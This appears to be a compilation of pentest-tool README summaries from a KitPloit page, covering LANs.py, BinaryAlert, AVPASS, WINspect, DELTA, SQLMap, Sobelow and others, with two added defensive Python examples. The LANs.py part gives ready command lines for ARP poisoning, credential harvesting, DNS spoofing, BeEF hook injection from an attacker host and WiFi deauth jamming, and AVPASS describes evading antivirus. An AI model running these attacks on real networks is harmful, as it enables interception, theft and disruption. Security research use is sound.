Channel: KitPloit - PenTest Tools!

LANs.py - Inject Code, Jam Wifi, And Spy on Wifi Users


LANs.py
  • Automatically find the most active WLAN users then spy on one of them and/or inject arbitrary HTML/JS into pages they visit.
    • Individually poisons the ARP tables of the target box, the router and the DNS server if necessary. Does not poison anyone else on the network. Displays most of the interesting bits of their traffic and can inject custom HTML into pages they visit. Cleans up after itself.
  • Also can be used to continuously jam nearby WiFi networks. This has an approximate range of a 1 block radius, but this can vary based on the strength of your WiFi card. This can be fine-tuned to allow jamming of everyone or even just one client. Cannot jam WiFi and spy simultaneously.
Prerequisites: Linux, python-scapy, python-nfqueue (nfqueue-bindings 0.4-3), aircrack-ng, python-twisted, BeEF (optional), nmap, nbtscan, tcpdump, and a wireless card capable of promiscuous mode if you don't know the IP of your target.
Tested on Kali. In the following examples 192.168.0.5 will be the attacking machine and 192.168.0.10 will be the victim.
All options:
python LANs.py  [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS] [-vmac VICTIMMAC]
[-d] [-v] [-dns DNSSPOOF] [-a] [-set] [-p] [-na] [-n]
[-i INTERFACE] [-r REDIRECTTO] [-rip ROUTERIP]
[-rmac ROUTERMAC] [-pcap PCAP] [-s SKIP] [-ch CHANNEL]
[-m MAXIMUM] [-no] [-t TIMEINTERVAL] [--packets PACKETS]
[--directedonly] [--accesspoint ACCESSPOINT]

Usage

Common usage:
python LANs.py -u -p
Active target identification which ARP spoofs the chosen target and outputs all the interesting non-HTTPS data they send or request. There's no -ip option so this will ARP scan the network, compare it to a live running promiscuous capture, and list all the clients on the network. Attempts to tag the targets with a Windows netbios name and prints how many data packets they are sending/receiving. The ability to capture data packets they send is very dependent on physical proximity and the power of your network card. Ctrl-C when you're ready and pick your target which it will then ARP spoof.
Supports interception and harvesting of data from the following protocols: HTTP, FTP, IMAP, POP3, IRC. Will print the first 135 characters of URLs visited and ignore URLs ending in .jpg, .jpeg, .gif, .css, .ico, .js, .svg, and .woff. Will also print all protocol username/passwords entered, searches made on any site, emails sent/received, and IRC messages sent/received.
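The ARP poisoning described above leaves a recognisable footprint on the wire: one MAC address starts answering for the router's IP and for the victim's IP at the same time, and both IPs abruptly change their MAC binding. The following Python example, added here and not part of LANs.py, runs exactly that check over a constructed list of ARP replies. The `ArpReply` type, the MAC addresses and the detection functions are illustrative; the 192.168.0.x addresses reuse the ones from the write-up.

```python
"""Passive ARP-spoofing detector (added example, not LANs.py code).

Two checks are applied to a stream of ARP replies:
  1. an IP whose MAC differs from a previously seen (or pinned) binding;
  2. a single MAC claiming more than one IP, which is how a poisoner that
     impersonates both the router and the victim looks on the wire.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ArpReply:
    sender_ip: str   # "I am this IP ..."
    sender_mac: str  # "... at this MAC"


# Constructed sample traffic: router (.1), victim (.10) and a third host (.5)
# announce themselves, then .5's MAC starts answering for the router and
# the victim, exactly the pattern the poisoning above produces.
SAMPLE_REPLIES = [
    ArpReply("192.168.0.1", "aa:bb:cc:00:00:01"),
    ArpReply("192.168.0.10", "aa:bb:cc:00:00:10"),
    ArpReply("192.168.0.5", "aa:bb:cc:00:00:05"),
    ArpReply("192.168.0.1", "aa:bb:cc:00:00:05"),   # router IP now claimed by .5's MAC
    ArpReply("192.168.0.10", "aa:bb:cc:00:00:05"),  # victim IP also claimed by .5's MAC
]


def detect_arp_spoofing(replies, known_bindings=None):
    """Return a list of alert strings for the given replies.

    known_bindings optionally pins trusted IP -> MAC pairs (e.g. the gateway)
    so that the very first spoofed reply is caught instead of being learned.
    """
    ip_to_mac = dict(known_bindings or {})
    mac_to_ips = defaultdict(set)
    for ip, mac in ip_to_mac.items():
        mac_to_ips[mac].add(ip)

    alerts = []
    for r in replies:
        previous = ip_to_mac.get(r.sender_ip)
        if previous is not None and previous != r.sender_mac:
            alerts.append(f"MAC change for {r.sender_ip}: {previous} -> {r.sender_mac}")
        ip_to_mac[r.sender_ip] = r.sender_mac

        mac_to_ips[r.sender_mac].add(r.sender_ip)
        if len(mac_to_ips[r.sender_mac]) > 1:
            claimed = sorted(mac_to_ips[r.sender_mac])
            alerts.append(f"{r.sender_mac} claims multiple IPs: {claimed}")
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoofing(SAMPLE_REPLIES):
        print(alert)
```

On a real segment the replies would come from a capture (Scapy's `sniff` with an ARP filter, for instance), and the gateway binding should be pinned from a trusted source rather than learned, since the first poisoned reply otherwise becomes the "known" one. Expect some noise from DHCP lease changes and virtual-machine NIC moves; the multiple-IP check is the more robust of the two because legitimate hosts rarely answer for several addresses.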

Running LANs.py without arguments will give you the list of active targets and, upon selecting one, it will act as a simple ARP spoofer.

Another common usage:
python LANs.py -u -p -d -ip 192.168.0.10
-d: open an xterm with driftnet to see all images they view
-ip: target this IP address and skip the active targeting at the beginning

HTML injection:
python LANs.py -b http://192.168.0.5:3000/hook.js
Inject a BeEF hook URL (http://beefproject.com/, tutorial: http://resources.infosecinstitute.com/beef-part-1/) into pages the victim visits. This just wraps the argument in <script> tags so you can really enter any location of a javascript file. Attempts to insert it after the first tag found in the page's HTML.
python LANs.py -c '<title>Owned.</title>'
Inject arbitrary HTML into pages the victim visits. First tries to inject it after the first <head> tag and failing that, injects prior to the first </head> tag. This example will change the page title to 'Owned.'

Read from pcap:
python LANs.py -pcap libpcapfilename -ip 192.168.0.10
To read from a pcap file you must include the target's IP address with the -ip option. It must also be in libpcap form which is the most common anyway. One advantage of reading from a pcap file is that you do not need to be root to execute the script.

DNS spoofing
python LANs.py -a -r 80.87.128.67
python LANs.py -dns eff.org
Example 1: The -a option will spoof every single DNS request the victim makes and when used in conjunction with -r it will redirect them to -r's argument address. The victim will be redirected to stallman.org (80.87.128.67) no matter what they type in the address bar.
Example 2: This will spoof the domain eff.org and subdomains of eff.org. When there is no -r argument present with the -a or -dns arguments the script will default to sending the victim to the attacker's IP address. If the victim tries to go to eff.org they will be redirected to the attacker's IP.

Most aggressive usage:
python LANs.py -v -d -p -n -na -set -a -r 80.87.128.67 -c '<title>Owned.</title>' -b http://192.168.0.5:3000/hook.js -ip 192.168.0.10

Jam all WiFi networks:
python LANs.py --jam

Jam just one access point (router)
python LANs.py --jam --accesspoint 01:MA:C0:AD:DY

All options:

Normal Usage:
  • -b BEEF_HOOK_URL: copy the BeEF hook URL to inject it into every page the victim visits, eg: -b http://192.168.1.10:3000/hook.js
  • -c 'HTML CODE': inject arbitrary HTML code into pages the victim visits; include the quotes when selecting HTML to inject
  • -d: open an xterm with driftnet to see all images they view
  • -dns DOMAIN: spoof the DNS of DOMAIN. e.g. -dns facebook.com will DNS spoof every DNS request to facebook.com or subdomain.facebook.com
  • -a: Spoof every DNS response the victim makes, effectively creating a captive portal page; -r option can be used with this
  • -r IPADDRESS: only to be used with the -dns DOMAIN option; redirect the user to this IPADDRESS when they visit DOMAIN
  • -u: prints URLs visited; truncates at 150 characters and filters image/css/js/woff/svg urls since they spam the output and are uninteresting
  • -i INTERFACE: specify interface; default is first interface in ip route, eg: -i wlan0
  • -ip: target this IP address
  • -n: performs a quick nmap scan of the target
  • -na: performs an aggressive nmap scan in the background and outputs to [victim IP address].nmap.txt
  • -p: print username/passwords for FTP/IMAP/POP/IRC/HTTP, HTTP POSTs made, all searches made, incoming/outgoing emails, and IRC messages sent/received
  • -pcap PCAP_FILE: parse through all the packets in a pcap file; requires the -ip [target's IP address] argument
  • -rmac ROUTER_MAC: enter router MAC here if you're having trouble getting the script to automatically fetch it
  • -rip ROUTER_IP: enter router IP here if you're having trouble getting the script to automatically fetch it
  • -v: show verbose URLs which do not truncate at 150 characters like -u
  • --jam: jam all or some 2.4GHz wireless access points and clients in range; use arguments below in conjunction with this argument if necessary
Wifi Jamming:
  • -s MAC_Address_to_skip: Specify a MAC address to skip deauthing. Example: -s 00:11:BB:33:44:AA
  • -ch CHANNEL: Limit wifijammer to single channel
  • -m MAXIMUM: Maximum number of clients to deauth. Use if moving around so as to prevent deauthing client/AP pairs outside of current range.
  • -no: Do not clear the deauth list when the maximum (-m) number of client/AP combos is reached. Must be used in conjunction with -m. Example: -m 10 -no
  • -t TIME_INTERVAL: Time between each deauth packet. Default is maximum. If you see scapy errors like 'no buffer space' try: -t .00001
  • --packets NUMBER: Number of packets to send in each deauth burst. Default is 1 packet.
  • --directedonly: Don't send deauth packets to the broadcast address of APs and only send to client/AP pairs
  • --accesspoint ROUTER_MAC: Enter the MAC address of a specific AP to target.

Clean up
Upon receiving a Ctrl-C:
-Turns off IP forwarding
-Flushes iptables firewall
-Individually restores the router and victim's ARP tables



BinaryAlert - Serverless, Real-time & Retroactive Malware Detection


BinaryAlert is an open-source serverless AWS pipeline where any file uploaded to an S3 bucket is immediately scanned with a configurable set of YARA rules. An alert will fire as soon as any match is found, giving an incident response team the ability to quickly contain the threat before it spreads.

Features
  • Built with Amazon Web Services (AWS): An AWS account is all you need to deploy BinaryAlert.
  • Broad YARA Support: Add your own YARA rules and/or automatically clone them from third-party repos. Both the PE and math modules are supported.
  • Real-Time: Files uploaded to BinaryAlert (S3 bucket) are immediately queued for analysis.
  • Serverless: All computation is handled by Lambda functions. No servers to manage means stronger security and automatic scaling!
  • Infrastructure-as-Code: The entire infrastructure is described with Terraform configuration files, enabling anyone to deploy BinaryAlert in a matter of minutes with a single command.
  • Retroactive Analysis: After updating the YARA ruleset, BinaryAlert will retroactively scan the entire file corpus to find any new matches.
  • Easily Configurable: BinaryAlert configuration is managed in a single Terraform variables file.
  • Quality Code: Written in Python3 with unit tests and linting to ensure a clean and reliable codebase.
  • Low Cost: The AWS bill is based only on how many files are analyzed.

Quick Start
  1. Install dependencies
    1. Install Python3, pip3, virtualenv, and Terraform.
    2. Create a virtual environment: virtualenv -p python3 venv
    3. Activate the virtual env: source venv/bin/activate
    4. Install third-party libraries: pip3 install -r requirements.txt
      1. If the installation encounters problems finding openssl.h, try export CFLAGS='-I/usr/local/opt/openssl/include' before the install.
  2. Configure settings
    1. Set your AWS credentials using any method supported by Terraform. The two simplest options are to run aws configure (saves ~/.aws/credentials file) or
    export AWS_DEFAULT_REGION="region-name"
    export AWS_ACCESS_KEY_ID="access-key"
    export AWS_SECRET_ACCESS_KEY="secret-key"
    2. Fill out the base configuration options in terraform.tfvars
  3. Deploy: python3 manage.py deploy
  4. In order to receive YARA match alerts, you must manually subscribe to the generated SNS topics. Go to the SNS console and add a subscription to the *_binaryalert_yara_match_alerts topic (which receives YARA match alerts) and the *_binaryalert_metric_alarms topic (which receives CloudWatch alerts if the service is down). SNS supports a variety of subscription endpoints, including email and SMS. SNS subscriptions must be confirmed by the destination, which is why this step can't be automated by Terraform.
That's it! Now any file you upload to the BinaryAlert S3 bucket will automatically trigger YARA analysis and you can rest easier knowing that your files are safe.

CLI Tool: manage.py
For simplicity, BinaryAlert management commands are bundled together in manage.py.
Usage: python3 manage.py [--help] [command]

YARA Rules
YARA rules are stored in the rules/ folder. See rules/README.md for more information about adding and updating YARA rules.

Architecture

  1. The organization collects files and delivers them to their BinaryAlert S3 bucket. Files of interest could include executable binaries, email attachments, documents, etc.
  2. Every file uploaded to the S3 bucket is immediately queued for analysis.
  3. A dispatching Lambda function runs every minute, grouping files into batches and invoking up to dozens of analyzers in parallel.
  4. Each analyzer scans its files using a list of pre-compiled YARA rules.
  5. YARA matches are saved to DynamoDB and an alert is sent to an SNS topic. We use StreamAlert to dispatch these alerts, but other organizations can instead consume the alerts via email or any other supported SNS subscription.
  6. For retroactive analysis, a batching Lambda function enqueues the entire S3 bucket to be re-analyzed.
  7. Configurable CloudWatch alarms will trigger if any BinaryAlert component is behaving abnormally. This will notify a different SNS topic than the one used for YARA match alerts.

Updating Pip Packages
The exact pip3 package versions used are frozen in requirements.txt. However, to make upgrading packages easier, requirements_top_level.txt contains only the top-level packages required by BinaryAlert. To upgrade the package requirements,
pip3 install -r requirements_top_level.txt --upgrade
pip3 freeze > requirements.txt


AVPASS - Tool For Leaking And Bypassing Android Malware Detection System


AVPASS is a tool for leaking the detection model of Android malware detection systems (i.e., antivirus software), and bypassing their detection logic by using the leaked information coupled with APK obfuscation techniques. AVPASS is not limited to the detection features used by detection systems, and can also infer detection rules so that it can disguise any Android malware as a benign application by automatically transforming the APK binary. To prevent leakage of the application logic during transformation, AVPASS provides an Imitation Mode that allows malware developers to safely query the detection features of interest without sending the entire binary.

AVPASS offers several useful features to transform any Android malware so it can bypass anti-virus software. Below are the main features AVPASS offers:
  • APK obfuscation with more than 10 modules
  • Feature inference for the detection system by using individual obfuscation
  • Rule inference of the detection system by using the 2^k factorial experiment
  • Targeted obfuscation to bypass a specific detection system
  • Safe query support by using Imitation Mode

DEMO
  • Bypassing API-, Dataflow-, Interaction-based detection systems

  • Inferring and Bypassing AVs through VirusTotal

Running & Docs
More documentation is available in docs/README.md.

Authors
This is the list of contributors who implemented AVPASS:
  • Jinho Jung
  • Chanil Jeon
  • Max Wolotsky
  • Insu Yun

WINspect - Powershell-based Windows Security Auditing Toolbox


WINspect is part of a larger project for auditing different areas of Windows environments. It focuses on enumerating different parts of a Windows machine, aiming to identify security weaknesses and point to components that need further hardening. The main targets for the current version are domain-joined Windows machines. However, some of the functions still apply to standalone workstations.

Features
This current version of the script supports the following features:
  • Checking installed security products.
  • Enumerating World Exposed local filesystem shares.
  • Enumerating domain users and groups with local group membership.
  • Enumerating registry autoruns.
  • Enumerating local services that are configurable by Authenticated Users group members.
  • Enumerating local services for which corresponding binary is writable by Authenticated Users group members.
  • Enumerating non-system32 Windows Hosted Services and their associated DLLs.
  • Enumerating local services with unquoted path vulnerability.
  • Enumerating non-system scheduled tasks.
  • Checking for DLL hijackability.
  • Checking for User Account Control settings.
  • Checking for unattended installs leftovers.
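As an added illustration of the unquoted service path check listed above (not WINspect's own PowerShell code), the Python below reproduces the logic over a constructed set of service ImagePath values and lists the ambiguous paths a defender has to make sure are not writable by unprivileged users. The service names, paths and function names are made up for the example.

```python
"""Unquoted service path audit (added example, not WINspect code).

When a service's ImagePath is unquoted and contains spaces, the service
control manager tries each space-delimited prefix as an executable before
the intended one. The audit therefore reports the prefixes that must not
be creatable by Authenticated Users. The entries below are constructed.
"""
import re

# Constructed sample: service name -> ImagePath as stored under
# HKLM\SYSTEM\CurrentControlSet\Services\<name> (hypothetical values).
SAMPLE_SERVICES = {
    "GoodSvc": r'"C:\Program Files\Good Vendor\goodsvc.exe" -run',
    "BadSvc": r"C:\Program Files\Bad Vendor\Sub Dir\badsvc.exe -k netsvcs",
    "SysSvc": r"C:\Windows\system32\svchost.exe -k LocalService",
    "NoSpaceSvc": r"C:\Tools\agent.exe",
}

# Executable portion ends at the first ".exe" that is followed by whitespace or end of string.
_EXE_RE = re.compile(r"^(.*?\.exe)(\s.*)?$", re.IGNORECASE)


def executable_path(image_path):
    """Return the unquoted executable portion of an ImagePath, or None if it is quoted/unparseable."""
    s = image_path.strip()
    if s.startswith('"'):
        return None  # quoted paths are used verbatim by the SCM and are not ambiguous
    m = _EXE_RE.match(s)
    return m.group(1) if m else None


def ambiguous_search_paths(exe_path):
    """List the paths Windows would try before exe_path, one per space in the path."""
    return [exe_path[:i] + ".exe" for i, ch in enumerate(exe_path) if ch == " "]


def find_unquoted_service_paths(services):
    """Map each vulnerable service name to the ambiguous paths its ImagePath allows."""
    findings = {}
    for name, image_path in services.items():
        exe = executable_path(image_path)
        if exe is None or " " not in exe:
            continue
        findings[name] = ambiguous_search_paths(exe)
    return findings


if __name__ == "__main__":
    for name, paths in find_unquoted_service_paths(SAMPLE_SERVICES).items():
        print(f"{name}: unquoted path with spaces; verify these are not user-creatable:")
        for p in paths:
            print("   ", p)
```

The remediation is to quote the ImagePath and to confirm that none of the listed parent directories grant write or create rights to Authenticated Users; on a live host the inputs would come from the service registry keys (or `Get-WmiObject Win32_Service` in PowerShell), and ImagePath values that start with environment variables such as `%SystemRoot%` should be expanded first.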

Supported Powershell Version
This version was tested in a powershell v2.0 environment.


DELTA - SDN Security Evaluation Framework


DELTA is a penetration testing framework that regenerates known attack scenarios for diverse test cases. This framework also provides the capability of discovering unknown security problems in SDN by employing a fuzzing technique.
  • Agent-Manager is the control tower. It takes full control over all the agents deployed to the target SDN network.
  • Application-Agent is a legitimate SDN application that conducts attack procedures and is controller-dependent. The known malicious functions are implemented as application-agent functions.
  • Channel-Agent is deployed between the controller and the OpenFlow-enabled switch. The agent sniffs and modifies the unencrypted control messages. It is controller-independent.
  • Host-Agent behaves as if it were a legitimate host participating in the target SDN network. The agent demonstrates an attack in which a host attempts to compromise the control plane.

Prerequisites
In order to build and run DELTA, the following are required:
  • An agent manager based on Ubuntu 14.04 LTS 64 bit
    • Ant build system
    • Maven v3.3.9
    • Vagrant
    • JDK 1.7 and 1.8
  • Target Controller (for application agent)
  • Cbench (for channel agent)
  • Mininet 2.1+ (for host agent)
  • (in the case of All-In-One Single Machine) Three virtual machines based on Ubuntu 14.04 LTS 64 bit.
    • VM-1: Target controller + Application agent
    • VM-2: Channel agent
    • VM-3: Host agent

Installing DELTA
DELTA installation depends on the Maven and Ant build systems. The mvn command is used to install the agent-manager and the agents. DELTA can support an All-In-One Single Machine environment via virtual machines as well as a real hardware SDN environment.
  • STEP 1. Get the source code of DELTA on the agent manager machine
$ git clone https://github.com/OpenNetworkingFoundation/DELTA.git
  • STEP 2. Install DELTA dependencies
$ cd <DELTA>/tools/dev/delta-setup/
$ ./delta-setup-devenv-ubuntu
  • STEP 3. Install DELTA using maven build
$ cd <DELTA>
$ source ./tools/dev/delta-setup/bash_profile
$ mvn clean install
  • STEP 4-a. (All-In-One Single Machine) Install three virtual machines using vagrant system
$ cd <DELTA>/tools/dev/delta-setup/
$ ./delta-setup-vms-ubuntu
$ cd vagrant/
$ vagrant up
  • STEP 4-b. (All-In-One Single Machine) Add NAT to VM3 (mininet)

  • In the case of an all-in-one single machine, the test environment is automatically set up as below:

Configuring your own experiments
  • Execute sudo without the password
$ sudo visudo
At the bottom of the file, type the following:
username ALL=(ALL) NOPASSWD: ALL
  • Configure password-less ssh login for the agents
$ vi <DELTA>/tools/dev/delta-setup/bash_profile
(by default, the addresses are set as vms)
export DELTA_APP=vagrant@10.100.100.11
export DELTA_CHANNEL=vagrant@10.100.100.12
export DELTA_HOST=vagrant@10.100.100.13
$ source <DELTA>/tools/dev/delta-setup/bash_profile

$ cd ~
$ ssh-keygen -t rsa
(Press enter)
$ ssh-copy-id -i ~/.ssh/id_rsa.pub $DELTA_APP
$ ssh-copy-id -i ~/.ssh/id_rsa.pub $DELTA_CHANNEL
$ ssh-copy-id -i ~/.ssh/id_rsa.pub $DELTA_HOST

Check if you can access the VMs without having to enter the password.
  • The agent-manager automatically reads a configuration file and sets up the test environment based on the file. DELTA/tools/config/manager.cfg contains the All-In-One Single Machine configuration by default. If you want to test a real SDN environment, you should specify your own configuration file.
CONTROLLER_SSH=vagrant@10.100.100.11
CHANNEL_SSH=vagrant@10.100.100.12
HOST_SSH=vagrant@10.100.100.13
TARGET_HOST=10.0.0.2
ONOS_ROOT=/home/vagrant/onos-1.6.0
CBENCH_ROOT=/home/vagrant/oflops/cbench/
TARGET_CONTROLLER=Floodlight
TARGET_VERSION=0.91
OF_PORT=6633
OF_VER=1.3
MITM_NIC=eth1
CONTROLLER_IP=10.100.100.11
SWITCH_IP=10.100.100.13,10.100.100.13,10.100.100.13
DUMMY_CONT_IP=10.0.2.2
DUMMY_CONT_PORT=6633
AM_IP=10.0.2.2
AM_PORT=3366
Floodlight 1.2
$ cd <DELTA>/tools/dev/app-agent-setup
$ ./floodlight-1.2-scp
ONOS 1.1
$ cd <DELTA>/tools/dev/app-agent-setup/onos
$ ./onos-1.1.0-scp
(on the controller machine) $ ./onos-1.1.0-setup
ONOS 1.6 or 1.9
$ cd <DELTA>/tools/dev/app-agent-setup/onos
$ ./delta-setup-onos <onos-version>
* Supported ONOS version in the script: 1.6, 1.9
OpenDaylight helium-sr3 (only JDK 1.7-supported)
$ cd <DELTA>/tools/dev/app-agent-setup
$ ./odl-helium-sr3-scp
(on the controller machine) $ ./odl-helium-sr3-setup
OpenDaylight Carbon
$ cd <DELTA>/tools/dev/app-agent-setup
$ ./odl-carbon-scp
(on the controller machine) $ ./odl-carbon-setup
  • The app-agent (on the controller machine) needs 'agent.cfg' file to connect to the agent-manager.
MANAGER_IP=10.0.2.2
MANAGER_PORT=3366

Running DELTA
  • STEP 1. Distribute the executable files to VMs
$ cd <DELTA>
$ source ./tools/dev/delta-setup/bash_profile
$ ./tools/dev/delta-setup/delta-agents-scp
  • STEP 2. Execute Agent-Manager first
$ cd <DELTA>
$ bin/run-delta tools/config/<configuration file> # e.g., manager_vm.cfg

DELTA: A Penetration Testing Framework for Software-Defined Networks

[pP] - Show all known attacks
[cC] - Show configuration info
[kK] - Replaying known attack(s)
[uU] - Finding an unknown attack
[qQ] - Quit

Command>_
  • STEP 3. Connect Web-based UI (port number is 7070)

Main Contributors
  • Seungsoo Lee (KAIST)
  • Jinwoo Kim (KAIST)
  • Changhoon Yoon (KAIST)
  • Sandra Scott-Hayward (Queen's University Belfast)
  • Seungwon Shin (KAIST)

Collaborators
  • Phil Porras, Vinod Yegneswaran (SRI International)
  • Kyuho Hwang, Daewon Jung (National Security Research Institute)
  • Atto Research

Nili - Tool for Network Scan, Man in the Middle, Protocol Reverse Engineering and Fuzzing


Nili is a Tool for Network Scan, Man in the Middle, Protocol Reverse Engineering and Fuzzing.

Prerequisites
  • Python - Python Programming Language
  • Scapy - Interactive Packet Manipulation Program
  • Netzob - Protocol Reverse Engineering, Modeling and Fuzzing

Installing
Here are some instructions for installing the prerequisites; select the ones for your operating system.

Unix-like
1- Install Python3 and pip:
$ sudo apt-get install python3
$ sudo apt-get install python3-pip
2- Install Scapy:
$ cd /tmp
$ git clone https://github.com/phaethon/scapy
$ cd scapy
$ sudo python3 setup.py install
3- Install Netzob:
$ git clone https://dev.netzob.org/git/netzob
$ cd ./netzob/
$ sudo apt-get install python3 python3-dev python3-setuptools build-essential
$ python3 setup.py install
$ python3 -m pip install bintrees --upgrade

Windows
1- Install python3
2- Install Scapy:
2-1- Install Winpcap
2-2- Install Scapy3k
python -m pip install scapy-python3
3- Install Netzob


SQLMap v1.1.8 - Automatic SQL Injection And Database Takeover Tool


SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features
  • Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix database management systems.
  • Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
  • Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
  • Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
  • Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
  • Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
  • Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.
  • Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
  • Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.

Installation
You can download the latest tarball by clicking here or latest zipball by clicking here.
Preferably, you can download sqlmap by cloning the Git repository:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
sqlmap works out of the box with Python version 2.6.x and 2.7.x on any platform.

Usage
To get a list of basic options and switches use:
python sqlmap.py -h
To get a list of all options and switches use:
python sqlmap.py -hh
You can find a sample run here. To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the user's manual.


Sobelow - Security-Focused Static Analysis for the Phoenix Framework


Sobelow is a security-focused static analysis tool for the Phoenix framework. For security researchers, it is a useful tool for getting a quick view of points-of-interest. For project maintainers, it can be used to prevent introducing a number of common vulnerabilities.
Currently Sobelow detects some types of the following security issues:
  • Insecure configuration
  • Known-vulnerable Dependencies
  • Cross-Site Scripting
  • SQL injection
  • Command injection
  • Denial of Service
  • Directory traversal
  • Unsafe serialization

Potential vulnerabilities are flagged in different colors according to confidence in their insecurity. High confidence is red, medium confidence is yellow, and low confidence is green.
A finding is typically marked "low confidence" if it looks like a function could be used insecurely, but it cannot reliably be determined if the function accepts user-supplied input. That is to say, green findings are not secure, they just require greater manual validation.
Note: This project is in constant development, and additional vulnerabilities will be flagged as time goes on. If you encounter a bug, or would like to request additional features or security checks, please open an issue!

Installation
To install Sobelow, you must have a working Elixir environment. Then, execute the following from the command line:
$ mix archive.install hex sobelow
You may also install directly from GitHub with the following command:
$ mix archive.install github nccgroup/sobelow

Use
The simplest way to scan a Phoenix project is to run the following from the project root:
$ mix sobelow

Options
  • --root -r - Specify application root directory
  • --with-code -v - Print vulnerable code snippets
  • --ignore -i - Ignore modules
  • --ignore-files - Ignore files
  • --details -d - Get module details
  • --all-details - Get all module details
  • --private - Skip update checks
  • --router - Specify router location
  • --exit - Return non-zero exit status
  • --format -f - Specify findings output format
  • --quiet - Return no output if there are no findings
  • --compact - Minimal, single-line findings
The root option takes a path argument:
$ mix sobelow --root ../my_project
The with-code option takes no arguments:
$ mix sobelow --with-code
The ignore option takes a comma-separated list of modules:
$ mix sobelow -i XSS.Raw,Traversal
The ignore-files option takes a comma-separated list of file names. File names should be absolute paths, or relative to the application root.
$ mix sobelow --ignore-files config/prod.exs
The details option takes a single module:
$ mix sobelow -d Config.CSRF
The exit option accepts a confidence threshold (low, medium, or high), and will return a non-zero exit status at or above that threshold.
$ mix sobelow --exit Low
The format option accepts an output format for findings. Current formats include txt (the default) and json.
Note: The json format option does not support the --with-code flag. All findings are organized by confidence level, and contain a "type" key. However, other keys may vary between finding types.
$ mix sobelow --format json

Configuration Files
Sobelow allows users to save frequently used options in a configuration file. For example, if you find yourself constantly running:
$ mix sobelow -i XSS.Raw,Traversal --with-code --exit Low
You can use the --save-config flag to create your .sobelow-conf config file:
$ mix sobelow -i XSS.Raw,Traversal --with-code --exit Low --save-config
This command will create the .sobelow-conf file at the root of your application. You can edit this file directly to make changes.
Now if you want to run Sobelow with the saved configuration, you can run Sobelow with the --config flag.
$ mix sobelow --config

False Positives
Sobelow favors over-reporting versus under-reporting. As such, you may find a number of false positives in a typical scan. These findings may be individually ignored by adding a # sobelow_skip comment, along with a list of modules, before the function definition.
# sobelow_skip ["Traversal"]
def vuln_func(...) do
...
end
Then, run the scan with the --skip flag.
$ mix sobelow --skip
Config and Vulnerable Dependency findings cannot be skipped in this way. For these, use the standard ignore option.

Modules
Findings categories are broken up into modules. These modules can then be used to either ignore classes of findings (via the ignore and skip options) or to get vulnerability details (via the details option).
This list, and other helpful information, can be found on the command line:
$ mix help sobelow

Updates
When scanning a project, Sobelow will occasionally check for updates, and will print an alert if a new version is available. Sobelow keeps track of the last update-check by creating a .sobelow file in the root of the scanned project.
If this functionality is not desired, the --private flag can be used with the scan.
$ mix sobelow --private



Comission - WhiteBox CMS Analysis


CoMisSion is a tool to quickly analyze a CMS setup. The tool:
  • checks for the core version;
  • looks for the last core version;
  • looks for vulnerabilities in core version used;
  • checks for plugins version;
  • looks for vulnerabilities in plugins version used;
A complete report can be generated in XLSX or CSV format.
The tool has been tested on Linux only.

Example
./commision.py -c wordpress -d /cms_dir -o report.xlsx -t XLSX

Installation
git clone https://github.com/Intrinsec/comission
pip install -r requirements.txt

Usage
usage: comission.py [-h] -d DIR -c CMS [-o FILE]

-h, --help show this help message and exit
-d DIR, --dir DIR CMS root directory
-c CMS, --cms CMS CMS type (Drupal, WordPress)
-o FILE, --output FILE Path to output file
-t TYPE, --type TYPE Type of output file (CSV, XLSX). Default to XLSX.

CMS supported
  • Wordpress
  • Drupal (no vulnerability checks)

Docker
We are not publishing any official image yet. To use the tool with docker, you can build an image. In the project folder, build with:
docker build -t isec/comission .
Then run it with:
docker run -it --rm -v /TARGET_PATH/:/cms_path/ -v /OUTPUT_DIR/:/output/ isec/comission -d /cms_path/ -c drupal -o /output/test_docker.xlsx -t XLSX
Be careful to change the path "TARGET_PATH" and "OUTPUT_DIR" to match your folders.

Author
Paul Mars (Intrinsec)
Based on an idea of Etienne Boursier (Intrinsec)


DSSS - Damn Small SQLi Scanner


Damn Small SQLi Scanner (DSSS) is a fully functional SQL injection vulnerability scanner (supporting GET and POST parameters) written in under 100 lines of code.

As optional settings it supports an HTTP proxy together with the HTTP header values User-Agent, Referer and Cookie.

Sample runs
$ python dsss.py -h
Damn Small SQLi Scanner (DSSS) < 100 LoC (Lines of Code) #v0.2o
by: Miroslav Stampar (@stamparm)

Usage: dsss.py [options]

Options:
--version show program's version number and exit
-h, --help show this help message and exit
-u URL, --url=URL Target URL (e.g. "http://www.target.com/page.php?id=1")
--data=DATA POST data (e.g. "query=test")
--cookie=COOKIE HTTP Cookie header value
--user-agent=UA HTTP User-Agent header value
--referer=REFERER HTTP Referer header value
--proxy=PROXY HTTP proxy address (e.g. "http://127.0.0.1:8080")

$ python dsss.py -u "http://testphp.vulnweb.com/artists.php?artist=1"
Damn Small SQLi Scanner (DSSS) < 100 LoC (Lines of Code) #v0.2o
by: Miroslav Stampar (@stamparm)

